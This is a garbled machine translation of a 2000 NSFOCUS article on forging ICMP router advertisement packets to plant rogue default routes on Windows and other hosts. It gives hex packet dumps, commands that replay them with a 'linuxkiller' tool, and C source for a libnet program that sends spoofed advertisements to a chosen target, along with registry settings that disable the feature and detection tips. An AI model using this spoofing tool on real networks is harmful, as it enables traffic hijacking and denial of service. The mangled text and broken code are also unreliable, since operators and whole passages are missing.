Example of use libnet (11) Author: ADAM (mailto: adam@nsfocus.com) finishing: Primary Four (mailto: scz@nsfocus.com) Home Page: http: //www.nsfocus.com Date: 2000-09-12 This Thought that ICMP does not have other types of messages other than the packets can remotely affect the routing table, and the result is found in the days of IPXODI pain torture to ICMP packets that may cause great destruction. RFC1256 defines the ICMP routing request / advertisement message. If the host's ICMP routing request is open, the host may broadcast when the host is started, and some routers will respond to ICMP routing packets in response to ICMP routing messages. Even if the host does not actively send ICMP routing request packets, ICMP routing packets sent by the router are affected by the routing table. ICMP Routing Notice Packets Generate in the host routing table is the default route. The life cycle is generally 30 minutes, while the router will take the initiative to send ICMP routing packets every 10 minutes, which actually means that the default route thus generated. Never expire.
-------------------------------------------------- ------------------------ The following is an example of ICMP routing request packet: FF FF FF FF FF 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 11 08 00 45 00 00 00 00 00 00 01 F1 36 C0 A8 08 5A C0 A8 FF FF 0A 00 F5 F5 FF 00 00 00 00 Type = 10 CODE = 0F5 FF Check and = 0xF5FF00 00 00 00 Unused (zero) The above packets are deposited in the routerselection.txt file, perform the following command as the root: ./ Linuxkiller -k routerselection.txt -w 5 -r 1000 ------------------ -------------------------------------------------- -------------------------------------------------- ------------------------------ the following is an example of a router advertisement ICMP packets: 00 0,000,111,111,000,000 22 22 22 08 00 45 00 00 24 12 34 00 00 ff 01 15 aa c0 a8 0a 50 c0 a8 08 5a 09 00 aa fb 01 02 7f ff c0 a8 0a 5a 00 00 00 00 00 00 00 11 11 11 target MAC00 00 00 22 22 22 22 Source Mac, this is an inexpensive, casually fill, but not as the target MAC 08 00 IP protocol 45 00 00 24 length (20 16) 12 34 ID number 00 00 Flagsff TTL01 ICMP protocol 15 aa checksum = 0x15AAC0 A8 0A 50 Source IP, 192.168.10.80c0 A8 08 5A target IP, 192.168.8.9009 00 Type = 9 code = 0AA FB checksum = 0xAfb01 item number 02 Each item size, fixed is 2, two 32bit7f ff survival time, refers to the effective time of the target host routing table The expired will be deleted unit is a second c0 a8 0a 5a router address 00 00 00 00 00 00 00 00 00 00 00 00 00, the larger the priority; the priority is 0x80000000 indicates that the router address cannot be used as the default route In the RouterAdvertisement.txt file, perform the following command as the root: ./ linuxkiller -k routeradvertisement.txt -w 5 -r 1000 --------------------- -------------------------------------------------- --- Router is not strictly seeding ICMP routing packets, but random, avoid conflicts with other routers, generally two notices between 450 seconds to 600 seconds,
That is, about 10 minutes, and the survival time in the announcement message is generally 30 minutes (1800 seconds). There is a use of the use of the living time. If an interface of the router is about to close, you can send the last ICMP routing message on this interface and set the survival time to zero. If there is a plurality of routes in the subnet, configure each route by the system administrator to send ICMP routing packets. These two ICMP packets are new, not all systems support them. Solaris 2.x /usr/sbin/in.rdisc is supporting their daemon programs, specific to the Man Manual. Run Microsoft Win9x, Win2K's DHCP client, and its ICMP routing request function is open by default. By falsifying ICMP routing packets, it is possible to add a default route on the DHCP client, which is higher than the default route from the DHCP server. For Win2K, ICMP Routing Notice Packets increased by the default routing priority below the default route from the DHCP server, so it is harmful to this attack, but because the content to the routing table, there is a possibility of DOS attacks. With the help of ADAM, find the corresponding registry information: ------------------------------------ -------------------------------------- HKEY_LOCAL_MACHINE / SYSTEM / CURRENTCONTROLSET / SERVICES / TCPIP / Parameters / Interfaces / {2FF4FAFD-40EC-4723-9FD0-86BFCBE0975B} This is the interface name. Your system is obviously not this name, you need to determine PerformRouterDiscovery REG_DWORD VALUE Meaning 0 Disable Routing Function 1 Enable Routing Discovery Function See RFC 1256- -------------------------------------------------- ----------------------- We suspect that you don't need to start DHCP Client, you can enable routing discovery functions, which in turn means that ICMP routing documents will affect this routing. table. ADAM sets this value on the Chinese Windows 2000 AD Server and restarts, I constructed a similar to the ICMP routing packets in the above example from another Windows 98, and the resulting default in the ADAM host routing table. Routing, but Metric up to 1000, actually means that there is not much opportunity to affect the IP packets sent by the ADAM host. The increase in ICMP host route redirect packet is the specific host route, the priority is quite high, pay attention to the final effect of the difference. ICMP Routing Notice Packets are not required to exist in the source IP. No source IP is one of the current valid routing. Do not do too much restrictions on the router IP, which is easier to fake more than ICMP host routing packets. Shuimu Tsinghua NetWork version discusses too many DHCP problems, and it is necessary to use a DHCP protocol in a large number, but also provide a good large-scale test environment for this attack. In fact, the host that is configured with the DHCP Client can disable the route discovery function through the above registry, which does not affect other features of the DHCP Client. By the way, give a solution to the ICMP host routing problem, without any reason to enable this feature in a simple LAN Tie, the solution is to ban it. The following is from the Chinese Windows 2000 Server version registry.
-------------------------------------------------- ------------------------ HKEY_LOCAL_MACHINE / SYSTEM / CURRENTCONTROLSET / Services / TCPIP / ParametersNableicmpRedirectReg_dword Value Meaning 0 Disable ICMP Redirection 1 allows ICMP redirection, default is allow------------------------------------------------- ------------------------ Regret is the lack of experimental environment, did not come to find the corresponding two registry settings under PWIN98, but I am sure they exist. How to detect, prevent ICMP routing advice? View the routing table is most direct. Note that the NetStat -s cannot detect this attack with the check ICMP redirection attack, and the kernel does not have a corresponding statistic. Protocol Analysis Software, IDS, etc. It is easy to find out this attack attempt. Use firewall to limit ICMP routing documents. Modify the unit system settings according to the specific situation. The author of Libnet does not do enough ideas to accept this new life, and Man Libnet can't find the corresponding set of package functions, we must construct such ICMP routing packets in the IP data area yourself. All the functions involved in this series are introduced, no longer repeat. The command line specifies the forged source IP (can randomly), attack target IP, forged routing IP (not considering randomization, not much sense, using the specified way to use direct routing), ICMP routing announcement message . -------------------------------------------------- ------------------------ / ** File: ICMP Router Advertisement Program for i386 / Linux Using Libnet * Version: 0.99 Alpha * Author: SCZ
/ * The use libnet must contain this header * // ******************************************************************************* ********************************************************************************* *********************************************************** **** / # Define Success 0 # define failure -1 # define defaultiranumber 5 / * Default Send ICMP Routing Notice Packet * / # define defaultttl 0x7FFF / * Default Survival Time * / # define defaultLEVEL 0 / * Lack Provincial routing priority * // ***************************************************** ********************** ** ***************************** ********************************************************* / / * Used to initialize pseudo random number generator * / u_long randomstate [64] = {0x00000003, 0x32d9c024, 0x9b66318 2, 0x5da1f342, 0x7449e56b, 0xbeb1dbb0, 0xab5c5918, 0x946554fd, 0x8c2e680f, 0xeb3d799f, 0xb11ee0b7, 0x2d436b86, 0xda672e2a, 0x1588ca88, 0xe369735d, 0x904f35f7,0xd7158fd6, 0x6fa6f051, 0x616e6b96, 0xac94efdc, 0xde3b81e0, 0xdf0a6fb5, 0xf103bc02, 0x48f340fb, 0x36413f93, 0xc622c298, 0xf5a42ab8, 0x8a88d77b, 0xf5ad9d0e, 0x8999220b, 0x27fb47b9, 0x9a319039,0x94102000, 0x9610000a, 0xc60a0000, 0x90022001, 0x8408e07f, 0x8528800a, 0x8088e080, 0x02800004,0x9612c002, 0x10bffff9, 0x9402a007, 0x81c3e008, 0xd6224000, 0x86102000, 0x94100003, 0xd60a0000,0x90022001, 0x840ae07f, 0x85288003, 0x94128002, 0x808ae080, 0x12bffa, 0x8600e007, 0x80a0e01f, 0x18800006, 0x808ae040, 0x02800004, 0x84103FFF, 0X85288003, 0x94128002, 0x81c3e008, 0xD4224000};
SIZE_T ipdataasize; u_char * packet = null; / * ICMP redirection packet with load * / size_t packet_size = libnet_ip_h; int Rawsocket; / ********************************* ******************************************************** ** function Prototype ** ******************************************************** ****************************** / VOID LIBNET_DO_CHECKSUM (u_char * buf, int protocol, int LEN); void libnet_init_packet (size_t p_size, u_char ** buf); int libnet_open_raw_sock (Int protocol); Void libnet_write_ip (int LEN); Void IRasend (U_LONG SRCIP, U_LONG DSTIP, U_LONG ROUTEIP, U_LONG IRANUMBER); void usage (char * arg); / * ----- -------------------------------------------------- --------------- * / void libnet_do_checksum (u_char * buf, int protocol, int LEN) {ix (libnet_do_checksum (buf, protocol, len) == -1) {libnet_erro r (LIBNET_ERR_FATAL, "libnet_do_checksum failed / n");} return;} / * end of Libnet_do_checksum * / void Libnet_init_packet (size_t p_size, u_char ** buf) {if (libnet_init_packet (p_size, buf) == -1) {libnet_error (LIBNET_ERR_FATAL, "Can not initialize packet / n");} return;} / * end of Libnet_init_packet * / int libnet_open_raw_sock (int protocol) {int s; if ((s = libnet_open_raw_sock (protocol)) == -1) {Libnet_error (libnet_err_fatal, "can't open rot% 08x / n", protocol);} return (s);} / * end of libnet_open_raw_sock * / void libnet_write_ip (int Sock, u_char * packet, int LEN) {Int W; if ((w =
libnet_write_ip (sock, packet, len)) , 1, 0, longoptionchar}, / * source ip * / {"di", 1, 0, longoptionchar}, / * attack target ip * / {"routeip", 1, 0, longoptionchar}, / * forged routing IP * / {"Num", 1, 0, longoptionchar}, / * ICMP packet number * / {"TTL", 1, 0, longoptionchar}, / * Survival time * / {"Level", 1, 0, Longoptionchar}, / * priority * / {0, 0, 0, 0}}; int longoptionindex = 0; / * Used to process long option * / / * IP uses network word sequence designation * / u_long srcip = 0xfffffffffFFFFFFFFFFFF ; / * Forged source IP, also router * / u_long dstip = 0xfffffffffff; / * prey * / u_long routeip = 0xfffffff; / * Forged routing ip * / u_long IRANumber = defaultiRanumber; / * ICMP routing announcement message * / Unsigned int randomseed = (unsigned int) Time (null); int C; u_char * ipdata; u_long * tempulong; u_short * tempushort; u_short ttl = Defaultttl; / * Survival time * / u_long level = defaultLEVEL; / * Priority * / if (argc == 1) {usage (argv [0]);} initstate (randomseed, (char *) randomstate, 128); SetState ((char *); opterr = 0; / * don't want getopt () Writing to stderr * / while ((c = getopt_long (argc, argv, "h", longoption, & longoptioninDex)! = Eof ) {Switch (c) {copy longoptionchar: / * Processing long option * / / * fprintf (stderr, "option% s", longoption [longoptionindex] .name); IF (OPTARG) {fprintf (stderr, "with arg% s", opTarg);} fprintf (stderr, "/ n"); * / if (optarg) {switch (longoptionINDEX) {case 0: / * return value is BIG-endian order * / srcip = libnet_name_resolve (OPTARG, LIBNET_DONT_RESOLVE); if (srcip == -1) {libnet_error (libnet_err_fatal, "Bad srcip:% S / N", OPTARG);} Break; Case 1: / * Return The value is BIG-endian order * / dstip = libnet_name_resolve (OPTARG, LIBNET_DONT_RESOLVE); if (dstip == -1) {libnet_error (libnet_err_fatal, "Bad Dstip:% S / N", OPTARG);} Break; Case 2: / * Return value is BIG-endian order * / routei P = LIBNET_NAME_RESOLVE (OPTARG, LIBNET_DONT_RESOLVE); if (routeip == -1) {libnet_error (libnet_err_fatal, "bad routeip:% s / n", OPTARG);} Break; Case 3: / * Adopt 10 credit * / irangeumber = (U_long) Strtoul (OPTARG, NULL, 10); if (iRANumber == 0) {fprintf (stderr, "check your iranumber / n"); exit (fail);} Break; case 4: / * adopted 10 System * / TTL = (U_Short) Strtoul (Optarg, NULL, 10); Break; Case 5: / * Adoption of 10 credit * / level = (u_long) Strtoul (Optarg, NULL, 10); Break; default: Break;} / * end of Switch * /} Break; Case 'h': Case '?': usage (argv [0]);} / * end of switch * /} / * end of while * / / * If you do not specify SRCIP, randomize * / If (srcip == -1) {srcip = (u_long) random ();} if (dstip == 0xffffff) {fprintf (stderr, "check your dstip / n"); exit (failure);} / * RouteIP Do not consider randomization, try to specify direct routing, but non-mandatory requirements * / if (routeip == 0xfffffffff) {routeip = (u_long) Random ();}} ipDataSize = 16; packet_size = ipdata asse; fprintf (stderr, " ICMP Route Advertising ...] / n "); / * Allocation memory and initialize into zero * / libnet_init_packet (packet_size, & packet); / * Some data of ICMP routing packets here * / ipdata = packet LIBNET_I P_H; ipdata [0] = 0x09; / * ICMP routing announcement message * / ipdata [1] = 0x00; / * Check and leave later call function calculation * / ipdata [4] = 0x01; / * item number * / Ipdata [5] = 0x02; / * Project size, fixed to 2 * / tempushort = (u_short *) (ipdata 6); * Tempushort = HTONS (TTL); / * Survival time * / tempulong = (u_long *) (IPDATA 8); * Tempulong = routeip; / * Routing IP * / TEMPULONG = (U_LONG *) (ipdata 12); * Tempulong = HTONL (Level); / * Priority * / / * Create Raw_Socket * / Rawsocket = LIBNET_OPEN_RAW_SOCK (ipproto_raw);